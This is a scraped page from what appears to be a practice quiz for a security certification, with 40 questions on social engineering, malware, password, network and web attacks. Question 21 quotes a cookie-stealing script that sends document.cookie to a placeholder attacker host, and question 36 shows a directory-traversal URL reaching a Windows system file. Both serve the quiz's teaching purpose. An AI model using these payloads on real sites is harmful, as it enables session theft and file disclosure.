Time limit: 0
Quiz Summary
0 of 40 Questions completed
Questions:
Information
You have already completed the quiz before. Hence you can not start it again.
Quiz is loading…
You must sign in or sign up to start the quiz.
You must first complete the following:
Results
Quiz complete. Results are being recorded.
Results
0 of 40 Questions answered correctly
Your time:
Time has elapsed
You have reached 0 of 0 point(s), (0)
Earned Point(s): 0 of 0, (0)
0 Essay(s) Pending (Possible Point(s): 0)
Categories
- Not categorized 0%
-
Unfortunately, you didn’t pass the quiz, but hey, you have unlimited access.😎
Practice makes you perfect! 👊 -
Congratulations! 🥳
You have passed the quiz successfully! You are one step closer to pass the real exam!
We hope to see you again on another certification path.✌️
Good luck with the exam! Stay strong.👊
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- Current
- Review
- Answered
- Correct
- Incorrect
-
Question 1 of 40
1. Question
Match the following social engineering techniques with their corresponding definitions.
Sort elements
- Phishing
- Smishing
- Vishing
- Spear phishing
-
An attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message
-
The user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile devices
-
Individuals are tricked into revealing critical financial or personal information to unauthorized entities through voice email or VoIP (voice over IP)
-
Is an email or electronic communications scam targeted towards a specific individual, organization or business.
CorrectIncorrect -
Question 2 of 40
2. Question
Which of the following social engineering techniques involves utilizing messaging platforms to disseminate unsolicited communications to a significant number of recipients for commercial advertisement or non-commercial advocacy?
CorrectIncorrect -
Question 3 of 40
3. Question
Which of the following types of social engineering techniques involves targeting a specific group of individuals by infecting websites that are frequently visited by members of that group?
CorrectIncorrect -
Question 4 of 40
4. Question
A company has recently noticed a significant decrease in the performance of its network and servers. Upon investigation, it was discovered that a malicious software had infiltrated the network and was using the company’s resources to mine cryptocurrency. Which type of malware is MOST likely responsible for the decrease in network and server performance?
CorrectIncorrect -
Question 5 of 40
5. Question
A technique by which both authorized and unauthorized individuals are able to bypass standard security protocols and attain elevated user access, such as root access, on a computer system, network, or software application is known as?
CorrectIncorrect -
Question 6 of 40
6. Question
Match the following password attack techniques with their corresponding definitions:
Sort elements
- Brute force attack
- Rainbow table attack
- Dictionary attack
- Plaintext Attack
-
An attacker submitting many passwords or passphrases with the hope of eventually guessing correctly
-
A type of hacking wherein the perpetrator tries to crack the passwords stored in a database system
-
A method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password
-
An attack model for cryptanalysis where the attacker has access to both the plaintext (called a crib), and its encrypted version (ciphertext).
CorrectIncorrect -
Question 7 of 40
7. Question
An organization has recently been the victim of a cyber attack where an attacker was able to compromise a software vendor’s update server and distribute malware through software updates. As the IT security administrator for the organization, you have been tasked with identifying the type of attack that occurred. Which of the following types of attacks BEST describes the scenario described above?
CorrectIncorrect -
Question 8 of 40
8. Question
Which of the following cryptographic attacks force victims to use older, more vulnerable versions of software in order to exploit known vulnerabilities against them?
CorrectIncorrect -
Question 9 of 40
9. Question
Which of the following attacks is known as URL hijacking?
CorrectIncorrect -
Question 10 of 40
10. Question
What type of attack involves an individual utilizing a compromised user account to gain unauthorized access to elevated privileges on a network?
CorrectIncorrect -
Question 11 of 40
11. Question
Which of the following injection attacks enables an attacker to disrupt the queries that an application conducts with its database?
CorrectIncorrect -
Question 12 of 40
12. Question
Which of the following are considered forms of cross-site request forgery (CSRF) attacks? (Select TWO.)
CorrectIncorrect -
Question 13 of 40
13. Question
An individual within the organization initiates a financial transfer request by sending an encrypted message to the financial administrator. An attacker intercepts this message, captures it, and subsequently resends it, appearing as a legitimate request to the financial administrator. As the message is already encrypted and appears authentic, the financial administrator is likely to comply with the request, potentially resulting in a significant financial loss for the organization. Which type of attack is described above?
CorrectIncorrect -
Question 14 of 40
14. Question
Which of the following types of attacks involves intercepting communications between an API endpoint and a client with the intent to steal or alter the confidential data being exchanged?
CorrectIncorrect -
Question 15 of 40
15. Question
Which type of wireless network attack involves the perpetrator creating a counterfeit access point that appears legitimate, but is used for intercepting wireless communications?
CorrectIncorrect -
Question 16 of 40
16. Question
An attacker is utilizing a Layer 2 type of attack to overload the MAC address table of a switch, causing it to enter a fail-open mode and effectively behave like a network hub. This allows the attacker to capture sensitive data from the network by intercepting all frames sent between devices on the network. Given the above scenario, identify the Layer 2 type of attack
CorrectIncorrect -
Question 17 of 40
17. Question
A company has classified its data into three categories: public, confidential, and highly confidential. Which of the following is an appropriate non-technical control that can be implemented for the confidential data category?
CorrectIncorrect -
Question 18 of 40
18. Question
An organization has experienced a security incident, and the incident response team needs to coordinate with the human resources department to investigate the incident. What is the primary reason for involving human resources in the incident response process?
CorrectIncorrect -
Question 19 of 40
19. Question
A security team is trying to share information about a new type of malware with other organizations in their industry. The team wants to use a standardized format to share the information. Which threat intelligence sharing format should the team use?
CorrectIncorrect -
Question 20 of 40
20. Question
An organization is reviewing its data types and is trying to determine which type of data should be classified as Restricted. Which of the following data types should be classified as Restricted?
CorrectIncorrect -
Question 21 of 40
21. Question
As a security analyst, you have been assigned to conduct a source code analysis of multiple websites. While reviewing the source code, you come across the following code snippet:
"http://www.client-website.com/search ? location.href=' http://www.villainsite.com/hijacker.php?cookie= '+document.cookie; "
Given this scenario, what type of attack is the attacker attempting to execute against the client’s website?
CorrectIncorrect -
Question 22 of 40
22. Question
An employee at a small business receives an email from a supposed client that includes a link to download a software update. The employee clicks on the link and unknowingly installs a malicious program on the company’s computer network. Which type of malware is most likely responsible for the compromise of the network?
CorrectIncorrect -
Question 23 of 40
23. Question
You are working as a security administrator for a large organization. Recently, you have noticed that some of the employees are able to access systems and data that they are not authorized to access. You suspect that the issue is related to privilege escalation. Which of the following is the MOST likely cause of the privilege escalation issue in this scenario?
CorrectIncorrect -
Question 24 of 40
24. Question
In which of the following types of Domain Name System (DNS) attacks, does an attacker introduce corrupt DNS data into a DNS resolver’s cache with the intent to redirect users to incorrect or malicious websites?
CorrectIncorrect -
Question 25 of 40
25. Question
Which of the following attacks is a Network Layer DDoS attack?
CorrectIncorrect -
Question 26 of 40
26. Question
The individual or group who unauthorizedly accesses and manipulates computer systems for personal or malicious purposes, such as data theft or system vandalism, is commonly referred to as:
CorrectIncorrect -
Question 27 of 40
27. Question
Which of the following resources can help you identify web application vulnerabilities and ensure the security of your web application?
CorrectIncorrect -
Question 28 of 40
28. Question
Which of the following terms refers to the unauthorized use or implementation of Information Technology (IT) applications and infrastructure within an enterprise without the knowledge or approval of the IT department?
CorrectIncorrect -
Question 29 of 40
29. Question
A malicious actor was able to gain access to a company’s confidential data by exploiting a flaw in the company’s software. The company was not aware of the flaw and had not yet released a patch for it. Which of the following types of attacks best describes this incident?
CorrectIncorrect -
Question 30 of 40
30. Question
What is the term used to describe the situation in which an Intrusion Detection System (IDS) identifies an activity as an attack, but the activity is actually considered acceptable behavior within the network?
CorrectIncorrect -
Question 31 of 40
31. Question
During a penetration testing engagement, an individual is gathering information about the target organization’s network and infrastructure to identify potential vulnerabilities. Which phase of the penetration testing process is this individual in?
CorrectIncorrect -
Question 32 of 40
32. Question
Which of the following cybersecurity testing exercise teams is known for its ability to perform both offensive and defensive tactics?
CorrectIncorrect -
Question 33 of 40
33. Question
Which of the following terms describes the tactic of directing individuals from a legitimate webpage to a fraudulent URL, typically used to impersonate a reputable site and collect sensitive information from unsuspecting victims?
CorrectIncorrect -
Question 34 of 40
34. Question
Which of the following terms refers to individuals who possess specialized knowledge and skills in the field of computer security, and use them for lawful and ethical purposes, rather than for malicious or illegal activities?
CorrectIncorrect -
Question 35 of 40
35. Question
In a large data center, a security administrator wants to reduce the risk of unauthorized access to sensitive data by implementing physical segmentation. Which of the following would be the most effective solution?
CorrectIncorrect -
Question 36 of 40
36. Question
As a security analyst, you have been assigned to conduct a vulnerability assessment of the company’s web assets utilizing the Acunetix Web Vulnerability Scanner tool. Upon reviewing the scan report, you have discovered a potential security issue related to the following URL:
http://test.webarticles.com/show.asp? view= ../../../../../Windows/system.ini HTTP/1.1Based on this information, what kind of vulnerability or attack is being indicated by this URL?
CorrectIncorrect -
Question 37 of 40
37. Question
A security analyst is tasked with analyzing endpoint user behavior to identify any suspicious activity. Which of the following UEBA techniques would be MOST useful in this scenario?
CorrectIncorrect -
Question 38 of 40
38. Question
What is the purpose of establishing ownership of data in an organization?
CorrectIncorrect -
Question 39 of 40
39. Question
An organization has recently been the victim of a successful cyber attack. The attackers were able to exploit a known vulnerability in the organization’s network infrastructure. The organization wants to know more about the vulnerability and how it can be mitigated. Which of the following resources would be most useful in identifying the vulnerability and potential solutions?
CorrectIncorrect -
Question 40 of 40
40. Question
A security analyst is conducting a security assessment of a company’s website and is attempting to identify any potential vulnerabilities that could be exploited. Which of the following steps would the analyst likely take to gather information about the website?
CorrectIncorrect